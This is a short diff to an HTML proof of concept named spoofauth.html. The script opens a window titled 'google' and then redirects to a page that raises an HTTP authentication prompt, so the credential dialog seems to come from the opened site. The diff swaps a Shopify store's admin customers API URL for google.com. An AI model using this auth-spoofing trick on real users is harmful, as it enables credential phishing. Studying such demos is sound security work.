--- a/spoofauth.html
+++ b/spoofauth.html
@@ -2,8 +2,8 @@
   <head>
   <script>
     function spoof() {
-      setTimeout(showAuthentication, 0);
-      window.open('https://lenskart-sing.myshopify.com/admin/api/customers.json', 'google');
+      setTimeout(showAuthentication, 3000);
+      window.open('https://google.com/', 'google');
      }
      function showAuthentication() {
        document.location = "http://www.httpwatch.com/httpgallery/authentication/authenticatedimage/default.aspx";
